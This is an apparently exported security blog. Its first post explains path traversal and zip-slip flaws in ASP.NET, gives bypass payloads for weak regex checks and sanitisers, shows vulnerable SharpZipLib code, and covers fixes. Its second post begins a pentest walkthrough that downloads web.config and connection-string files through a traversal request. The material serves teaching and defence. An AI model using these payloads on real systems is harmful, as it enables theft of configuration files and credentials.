<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: example-mvc-application.minded</span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[...]</span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><br /></span></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
Response:</div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP/1.1 200 OK<br style="box-sizing: border-box;" />[...]</span></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><?xml version="1.0" encoding="utf-8"?></span></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div style="font-family: lato, sans-serif; font-size: 14px;">
<span style="border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><configuration></span><br style="box-sizing: border-box;" /><span style="color: #555555;"><span style="background-color: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> <configSections></span></span><span style="background: rgb(255 , 255 , 255); border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" /></span></span></span></div>
<div style="background-color: white; font-family: lato, sans-serif; font-size: 14px;">
<span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[...]</span><br />
<span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><br /></span></div>
<div style="background-color: white; color: #555555; font-family: lato, sans-serif; font-size: 14px;">
<span style="background-color: transparent; font-family: "courier new" , "courier" , monospace;"></span></div>
<div style="background-color: white;">
<b>Traversal in Unzip Function</b></div>
<div style="background-color: white;">
<div style="text-align: justify;">
Another exploit through URI normalization abuse is the unzip directory traversal, which can be exploited using a symlink to extract file to parent directories. There are several tools to create malicious zip files, for example <a href="https://github.com/ptoomey3/evilarc">Evilarc</a>.<br />
An example of usage can be seen below:</div>
</div>
</div>
</div>
</div>
<pre class="prettyprint"><span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">$ python evilarc.py minded.aspx --path inetpub/wwwroot/ --os unix --depth 9 --output-file minded.zip
Creating minded.zip containing ../../../../../../../../../inetpub/wwwroot/minded.aspx</span><span style="color: black; font-size: small;">
</span></pre>
And here is the structure of the resulting zip file: <br />
<pre><span style="color: black; font-family: "times new roman"; font-size: small;">$ unzip -l minded.zip
Archive: minded.zip
Length Date Time Name
--------- ---------- ----- ----
1254 2018-10-15 15:31 ../../../../../../../../../inetpub/wwwroot/minded.aspx
--------- -------
1254 1 file </span></pre>
<div>
<div>
<div style="text-align: justify;">
Many common zip programs (Winzip, etc) will prevent extraction of zip files whose embedded files contain paths with directory traversal characters. However, many software development libraries do not include same protection mechanisms. This year a good list of impacted libraries has been made with <a href="https://github.com/snyk/zip-slip-vulnerability">Zip Split Disclosuring Project</a>, which collects all projects has been involved in this security leakage.</div>
</div>
<div style="color: black; font-family: "Times New Roman"; font-size: medium;">
<br /></div>
</div>
<h3 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-f111fb38-7fff-73bd-34df-854d0d8acf6a">Vulnerable code</span></h3>
<div>
Here we will see some vulnerable code example, which use different approach in order to attempt to fix path traversal, but without succeeding.</div>
<div>
<h4>
Incorrect Path Validation</h4>
<div style="text-align: justify;">
When we talk about validation we refer to the verification of data being submitted, to be sure that conforms to a rule or set of rules. These could be a simple not-empty check, a complex regular expression, even a whitelist or blacklist checks.</div>
<div style="text-align: justify;">
Talking about paths, whitelist and blacklist checks aren't always possible because sometimes the expected items aren't decided before runtime execution, so it may be a good idea using a regular expression, but this must be done carefully, because defining suitable regular expressions may be practically difficult, so this may bring to security leakage.</div>
<br />
See the <b>vulnerable</b> example below:<br />
<pre class="prettyprint"><b> Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)");</b> Match match = regex.Match(location);
if (match.Success){}</pre>
<div style="text-align: justify;">
If we try to access another file which do not have <i>.dat</i> extension, application will prevent malicious access to the resource, like this:</div>
<br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : /../web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server validation : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">../web.config -> Fail m</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">atch regexp!</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\defaultContent.dat</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;"><br /></span> <br />
<div style="text-align: justify;">
<span style="background-color: white;"><span style="background-color: transparent;"><span style="background-color: transparent;">But since the regular expression does not verify if extension is at the latest position of matching string, this check can be exploited by providing fake path which will be ignored during resource retriving, so server does URI normalization that can be abused, like this:</span></span></span></div>
<br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=</span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace; font-size: 14px;">fake.dat/../</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">../web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server validation : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;"><span style="background-color: #f9f2f4; color: #c7254e;">fake.dat/../</span>../web.config -> Success m</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">atch regexp!</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\<span style="background-color: #f9f2f4; color: #c7254e;">fake.dat/../</span>../web.config</span><br />
<b><br /></b><span style="background-color: white;">When server will access the resource, the path will be :</span><span style="background-color: #eeeeee; color: #696666;">\web.config</span><span style="background-color: white;">.</span><br />
<h4>
Incorrect Path Sanitization</h4>
<div style="text-align: justify;">
When we talk about sanitization we refer to the manipulation of user input before it begins used in application business logic, so removing, escaping, replacing, parts of user input in order to avoid a wrong application behavior. Talking about path, a good example of weak sanitization can be the removing of <span style="text-align: justify;">"../" characters sequence.</span></div>
See the <b>vulnerable </b>example below:<br />
<br class="Apple-interchange-newline" />
<pre class="prettyprint"> location = location.Replace(@"..\", ""); //win
if(File.Exists(location))</pre>
<div style="text-align: justify;">
This is going to remove the occurrence of "..\" in user input, so when a path traversal is provided, it is transformed and sanitized like this:<br />
<br /></div>
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=..\web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server Sanitization : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">..\web.config -> </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\web.config </span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;"><br /></span>
<br />
<div style="text-align: justify;">
But if we just change the back-slash ( \ ) with slash( / ), it can be exploited again, because servers usually do URL normalization:<br />
<br /></div>
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=../web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server Sanitization : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">../web.config -> ../</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\../web.config </span><br />
<br />
<div style="text-align: justify;">
One might be tempted to remove them both, but this isn't a solution because we can again exploit it throgh a double nested dot-dot-slash payload, like this :</div>
<br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=...\.\web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server Sanitization : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">.</span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace; font-size: 14px;">..\</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">.\web.config -> ..\</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\..\web.config </span><br />
<br />
<div style="text-align: justify;">
While first nested "..\" is begin removed, the second one it's ignored and bring to Path Traversal. <span style="background-color: white;">When the server accesses the resource, the normalized </span><span style="background-color: white;">path</span><span style="background-color: white;"> will be </span><span style="background-color: #eeeeee; color: #696666;">\web.config</span><span style="background-color: white;">.</span></div>
<div style="text-align: justify;">
<h4 style="text-align: start;">
Vulnerable Unzip library</h4>
<div style="text-align: justify;">
When using a unzip library, you need to be careful because there may be security lackage caused by a vulnerable code, this can be a known or unknown problem in the library.<br />
For example if we have a look to the source of SharpZipLib library <a href="https://github.com/piksel/SharpZipLib/blob/0.86.0.518/src/Zip/WindowsNameTransform.cs#L130">on version which was vulnerable to traversal unzip </a> we can see where the problem was:<br />
<pre class="prettyprint">public string TransformFile(string name)
{
if (name != null) {
name = MakeValidName(name, _replacementChar);
if (_trimIncomingPaths) {
name = Path.GetFileName(name);
}
// This may exceed windows length restrictions.
// Combine will throw a PathTooLongException in that case.
if (_baseDirectory != null) {
<b>name = Path.Combine(_baseDirectory, name);</b>
}
} else {
name = string.Empty;
}
return name;
}</pre>
As can be seen, the basepath is simply concatenated with name of file from compressed archive, the ability to use upper-directory charaters sequence in name of file compressed is available from zip specific, but since not all developers knows, this usually lead to path traversal issues, thats why security by default should be used in library methods, disallowing traversal path unzipping by default.<br />
<br /></div>
</div>
<h3 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-f111fb38-7fff-73bd-34df-854d0d8acf6a">How to fix</span></h3>
<div>
<div style="text-align: justify;">
Obviously the most effective approach is to map resource location using indirect object reference, so avoiding that source (user input) and sink (reading/writing/deleting files or directories) meet allowing exploits. However this is not always a suitable solutions , it could cost development resources or it couldn't be supported within application architecture, or just not be necessary, so in other case we can combine <b>path validation,</b> <b>path sanitization </b> and <b>absolute path check</b>;</div>
<br />
<div style="text-align: justify;">
The <b>absolute path check</b> means that we are going to verify from the root, if the file we are about to access is what we were expecting. In other words we segregate resources through path canonicalization, so making it absolute before using it in the application business logic. The canonicalization is a process of lossless reduction of user input to its equivalent simplest known form. In C# there is a method called "System.IO.Path.GetFullPath" which gives the canonicalized path, and we just check if starts with an authorized location. </div>
</div>
</div>
<pre class="prettyprint" style="font-weight: 400;">protected string readFile(string location){
<b>
Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)$");</b> Match match = regex.Match(location);
if (match.Success){
if(File.Exists(location)<b> && Path.GetFullPath(location).StartsWith(@"C:\Applications\Documents",StringComparison.OrdinalIgnoreCase)</b>)
{
using (StreamReader reader = new StreamReader(location))
{
return reader.ReadToEnd();
}
}
else
{
return "File not found";
}
}
else
{
return "File name not valid";
}
}</pre>
<br />
<h4>
Traversal Uzip</h4>
<div style="text-align: justify;">
Before use an unzip library must be sure if has been found vulnerable to unzip directory traversal, for example checking on <a href="https://github.com/snyk/zip-slip-vulnerability" style="text-align: justify;">Zip Split Disclosuring Project</a><span style="text-align: justify;">, on <a href="https://www.cvedetails.com/">CVE database</a>, or testing it as we have shown.</span></div>
<span style="text-align: justify;"><br /></span><span style="text-align: justify;"><br /></span><br />
<span style="font-size: 18.72px; font-weight: 700;">Conclusion</span><br />
<br />
Shall we try to do summary between approaches.<br />
<br />
<table style="border: 1px solid #000; width: 100%;"> <tbody>
<tr> <th style="width: 20%;"></th> <th style="width: 40%;"><div style="text-align: left;">
Functionality</div>
</th> <th style="width: 40%;"><div style="text-align: left;">
Risks</div>
</th> </tr>
<tr> <td>Validation<br />
<br /></td> <td>Reject input which do not respect decided rules<br />
<br /></td> <td>May lead to other security issue, XSS, SQL Injection even log injection<br />
<br /></td> </tr>
<tr> <td>Sanitization<br />
<br /></td> <td>Remove unwanted characters before it begin used from application</td> <td>If not in whitelist may leave some more unexpected characters</td> </tr>
<tr> <td>Absolute Path Check<br />
<br /></td> <td>Using canonicalization verify the correct file segregation</td> <td>If not validated and sanitizated the user input may lead to other security issue</td> </tr>
</tbody></table>
<br />
<div style="text-align: justify;">
So since Security is not a static situation, nor a destination to be reached, but rather a continuous process approaching the fix to a path traversal only with a single method can be simplistic and often not resolutive. So absolutely the best way is to use a security-oriented mentality that involves different layers of the development process (you can check out how much this orientation is in your company with the new <a href="https://www.mindedsecurity.com/index.php/services/consulting/swsecurity-5d-framework-survey">Minded Security Software Security 5D framework</a>), but speaking from a technical point of view, validation, sanitization and canonicalization are 3 methods that should be complementarily used to minimize security risks.</div>
<br />
<br />
<span style="font-size: 18.72px; font-weight: 700;">References</span><br />
<ul>
<li>https://www.owasp.org/index.php/Path_Traversal</li>
<li>http://cwe.mitre.org/data/definitions/22.html</li>
<li>https://www.owasp.org/index.php/File_System#Path_traversal</li>
<li>https://unicode-search.net/unicode-namesearch.pl?term=SLASH</li>
</ul>
<br />
<br />
<b>Author: Enrico Aleandri</b><br />Giorgio Fedonhttp://www.blogger.com/profile/17285473210424014740noreply@blogger.com2tag:blogger.com,1999:blog-7122745763234660283.post-47631175566295680582018-10-09T08:30:00.002-07:002019-03-02T01:01:19.157-08:00From Path Traversal to Source Code in Asp.NET MVC Applications<h3>
Introduction</h3>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHIkRKLrs3XbNHW0sut9RbCya5Y54zwOXlQk4Qf_p-zZszXrne_HON_sdL4qzF-ZlzkgTqQZVtCEH0WDaiJK_Wo_7N9X5VutTEuWZvdp9POoX04n0AO_lReMaOXnUHHtw3xPJitLUdW9W/s1600/1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="550" data-original-width="500" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHIkRKLrs3XbNHW0sut9RbCya5Y54zwOXlQk4Qf_p-zZszXrne_HON_sdL4qzF-ZlzkgTqQZVtCEH0WDaiJK_Wo_7N9X5VutTEuWZvdp9POoX04n0AO_lReMaOXnUHHtw3xPJitLUdW9W/s320/1.png" width="290" /></a>Model-View-Controller web applications may be difficult to pentest, since they strongly depend -for almost any aspect- on the technology they are developed and deployed with. From the attacker perspective, interacting with a complex multi-layer web application means dealing with very technology-dependent configuration files and implementations; on the contrary, classic web applications (such as WebForms) present a more traditional and simple structure, where looking interesting data and handlers may be easier. </div>
<div>
<style type="text/css">
@page { margin: 0.79in }
p { margin-bottom: 0.1in; direction: ltr; line-height: 115%; text-align: left; orphans: 2; widows: 2 }
p.western { so-language: en-US }
</style>
<br /></div>
<div style="text-align: justify;">
In this post we will describe a series of steps, based on real world experience, to exploit a Path Traversal vulnerability and reach a full disclosure of source code, by downloading and decompiling DLLs of a Model-View-Controller application within .Net MVC architecture and <a href="https://www.c-sharpcorner.com/article/learn-about-razor-view-engine/" target="_blank">Razor</a> as the View Engine.<br />
<br /></div>
<h3>
Prerequisite</h3>
<div style="text-align: justify;">
A Path Traversal vulnerability is present on the target application, and the standard web.config file can be downloaded.</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<b>Note: </b>most recent IIS versions and, in general, hardened installations, do not allow web handlers to retrieve files outside their sandbox or scope (i.e. the root folder of the web application, for example c:\inetpub\wwwroot\application_name\)<br />
<br />
<h3>
Main structure</h3>
<div>
<div style="text-align: justify;">
As any .Net application, MVC applications have a web.config file, where "<span style="font-family: "courier new" , "courier" , monospace;">assemblyIdentity</span>" XML tags identifies every binary file the application uses.</div>
<div style="text-align: justify;">
<br />
Request:</div>
</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">GET /download_page?id=<b>..%2f..%2fweb.config</b> HTTP/1.1</span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Host: example-mvc-application.minded</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">[...]</span></span></div>
<div>
<br />
Response:</div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">HTTP/1.1 200 OK<br /> [...]</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><?xml version="1.0" encoding="utf-8"?></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"><configuration></span><br /><span style="background-color: white;"> <configSections></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </configSections></span><br /><span style="background-color: white;"> <appSettings></span><br /><span style="background-color: white;"> <add key="webpages:Version" value="3.0.0.0" /></span><br /><span style="background-color: white;"> <add key="webpages:Enabled" value="false" /></span><br /><span style="background-color: white;"> <add key="ClientValidationEnabled" value="true" /></span><br /><span style="background-color: white;"> <add key="UnobtrusiveJavaScriptEnabled" value="true" /></span><br /><span style="background-color: white;"> </appSettings></span><br /><span style="background-color: white;"> <system.web></span><br /><span style="background-color: white;"> <authentication mode="None" /></span><br /><span style="background-color: white;"> <compilation debug="true" targetFramework="4.6.1" /></span><br /><span style="background-color: white;"> <httpRuntime targetFramework="4.6.1" /></span><br /><span style="background-color: white;"> </system.web></span><br /><span style="background-color: white;"> <system.webServer></span><br /><span style="background-color: white;"> <modules></span><br /><span style="background-color: white;"> <remove name="FormsAuthentication" /></span><br /><span style="background-color: white;"> </modules></span><br /><span style="background-color: white;"> </system.webServer></span><br /><span style="background-color: white;"> <runtime></span><br /><span style="background-color: white;"> <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="Microsoft.Owin.Security" /></span></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><</span><b style="background-color: #f9f2f4;">assemblyIdentity</b><span style="background-color: #f9f2f4;"> name="Microsoft.Owin.Security.OAuth" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="Microsoft.Owin.Security.Cookies" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="Microsoft.Owin" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><</span><b style="background-color: #f9f2f4;">assemblyIdentity</b><span style="background-color: #f9f2f4;"> name="Newtonsoft.Json" culture="neutral" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><</span><b style="background-color: #f9f2f4;">assemblyIdentity</b><span style="background-color: #f9f2f4;"> name="System.Web.Optimization" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="WebGrease" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="System.Web.Helpers" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="System.Web.Mvc" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="System.Web.WebPages" /></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" /></span><br /><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> </assemblyBinding></span><br /><span style="background-color: white;"> </runtime></span><br /><span style="background-color: white;"> <entityFramework></span><br /><span style="background-color: white;"> <defaultConnectionFactory type="System.Data.Entity.Infrastructure.LocalDbConnectionFactory, EntityFramework"></span><br /><span style="background-color: white;"> <parameters></span><br /><span style="background-color: white;"> <parameter value="mssqllocaldb" /></span><br /><span style="background-color: white;"> </parameters></span><br /><span style="background-color: white;"> </defaultConnectionFactory></span><br /><span style="background-color: white;"> <providers></span><br /><span style="background-color: white;"> <provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" /></span><br /><span style="background-color: white;"> </providers></span><br /><span style="background-color: white;"> </entityFramework></span><br /><span style="background-color: white;"> <system.codedom></span><br /><span style="background-color: white;"> <compilers></span><br /><span style="background-color: white;"> <compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CodeDom.Providers.DotNetCompilerPlatform.CSharpCodeProvider, Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Version=1.0.0.0, Culture=neutral” warningLevel="4" compilerOptions="/langversion:6 /nowarn:1659;1699;1701" /></span><br /><span style="background-color: white;"> <compiler language="vb;vbs;visualbasic;vbscript" extension=".vb" type="Microsoft.CodeDom.Providers.DotNetCompilerPlatform.VBCodeProvider, Microsoft.CodeDom.Providers.DotNetCompilerPlatform, Version=1.0.0.0, Culture=neutral" warningLevel="4" compilerOptions="/langversion:14 /nowarn:41008 /define:_MYTYPE=\&quot;Web\&quot; /optionInfer+" /></span><br /><span style="background-color: white;"> </compilers></span><br /><span style="background-color: white;"> </system.codedom></span><br /><span style="background-color: white;"></configuration></span></span><br />
<br />
<div style="text-align: justify;">
Other files that could be found in the root directory of a .Net application:</div>
</div>
<div>
<h4 style="text-align: justify;">
/global.asax</h4>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %></span><br />
<br />
<h4>
/connectionstrings.config</h4>
<div>
<b>Note:</b> this file contains passwords!<br />
<br /></div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><connectionStrings></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <add name="DefaultConnection" <b>connectionString</b>="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" /></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"></connectionStrings></span></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbnHsuSBNrBZgsHTGBopoPo6jxngDgQe8dbUazsqAPZctQnX_JWnVXKGWQDjgNzAIL5Af2-cDku664ZyekH18Qd_TIDCtcWDCSqw_Kt5e62_QmH69qe4qTrhqsXD4ujL8FJb8obGuH3yJQ/s1600/2.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="714" data-original-width="427" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbnHsuSBNrBZgsHTGBopoPo6jxngDgQe8dbUazsqAPZctQnX_JWnVXKGWQDjgNzAIL5Af2-cDku664ZyekH18Qd_TIDCtcWDCSqw_Kt5e62_QmH69qe4qTrhqsXD4ujL8FJb8obGuH3yJQ/s640/2.png" width="382" /></a><br />
<div style="text-align: justify;">
<br />
In addition, .Net MVC applications are structured to define other web.config files, having the aim to include any declaration for specific namespaces for each set of viewpages, relieving developers to declare “@using” namespaces in every file.<br />
As shown in the picture, representing a VisualStudio MVC/Razor project for a simple application, the main Views folder includes a web.config file:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>/Views/Web.config</li>
</ul>
<b>Note:</b> the /Views folder is part of the Razor View Engine configuration.<br />
<br />
<div style="text-align: justify;">
If the application uses Areas, consider that each Area with graphical interface capabilities could have a dedicated ./Views folder containing a Web.config file for further specific namespaces.</div>
<ul>
<li><area-name-1>/Views/web.config</li>
<li><area-name-2>/Views/web.config</li>
</ul>
<div style="text-align: justify;">
<br />
Any /Views and <area-name>/Views directory may contain a web.config file, that can be downloaded via the former Path Traversal.<br />
<br />
Web.config files may refer to other classes via the "<span style="font-family: "courier new" , "courier" , monospace;">type=</span>" attribute, as well as new namespaces.<br />
